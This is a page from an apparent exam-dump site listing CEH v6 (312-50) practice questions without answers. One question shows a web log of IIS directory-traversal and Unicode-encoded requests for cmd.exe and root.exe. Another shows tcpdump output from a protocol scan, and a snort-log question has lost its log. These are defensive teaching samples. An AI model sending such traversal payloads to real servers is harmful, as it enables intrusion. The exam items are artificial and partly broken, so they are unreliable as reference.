PrepAway - Latest Free Exam Questions & Answers

Category: 312-50 (CEH v6)

Exam 312-50: Ethical Hacking and Countermeasures (CEH v6)

What caused this?

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.
What caused this? GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%
5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
2f../winnt/system32/cmd.exe?/c+dir

Study the log below and identify the scan type.

Study the log below and identify the scan type.
tcpdump -vv host 192.168.1.10
17:34:45.802163 eth0 victim: ip-proto-117 0 (ttl 48, id 36166)
17:34:45.802216 eth0 victim: ip-proto-25 0 (ttl 48, id 33796)
17:34:45.802266 eth0 victim: ip-proto-162 0 (ttl 48, id 47066)
17:34:46.111982 eth0 victim: ip-proto-74 0 (ttl 48, id 35585)
17:34:46.112039 eth0 victim: ip-proto-117 0 (ttl 48, id 32834)
17:34:46.112092 eth0 victim: ip-proto-25 0 (ttl 48, id 26292)
17:34:46.112143 eth0 victim: ip-proto-162 0 (ttl 48, id 51058)
tcpdump -vv -x host 192.168.1.10
17:35:06.731739 eth0 victim: ip-proto-130 0 (ttl 59, id 42060) 4500 0014 a44c 0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000

Given the following extract from the snort log on a honeypot, what service is being exploited?

Given the following extract from the snort log on a honeypot, what service is being exploited?


Page 4 of 125« First...23456...102030...Last »